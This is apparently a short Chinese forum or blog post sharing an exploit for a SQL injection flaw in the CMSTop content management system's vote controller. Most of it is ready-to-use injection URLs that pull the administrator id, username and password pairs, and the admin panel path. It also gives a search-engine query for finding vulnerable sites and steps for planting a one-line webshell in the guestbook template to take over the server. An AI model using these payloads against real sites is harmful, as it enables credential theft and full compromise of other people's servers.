cmstop通杀注入漏洞

玩了几个月这个漏洞了 看到九区那边ztz大牛公布出exp了 漏洞文件/apps/vote/controller/vote.php app.xxx.com/?app=vote&controller=vote&action=total&contentid=1 获取管理员id [php] ?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select userid from cmstop_admin where departmentid=2 limit 0,1;# [/php] 获取到底管理id是啥你就自己写啥 [php] ?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select concat(username,char(0x3d),password) from cmstop_member where userid=1;# [/php] 读取后台地址 [php] ?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20url%20from%20cmstop_mymenu%20where%201=1%20limit%200,1;%23 [/php] cmstop只有app这个有动态脚本 关于如何找到这个动态的站 site:xxx.com inurl:roll.php 数据库文件 cmstop/config/db.php 关于拿shell 管理员帐号进入后台后直接模板里面guestbook模板插入一句话 然后访问app.xxx.com/?app=guestbook 大牛研究去吧。。

发表评论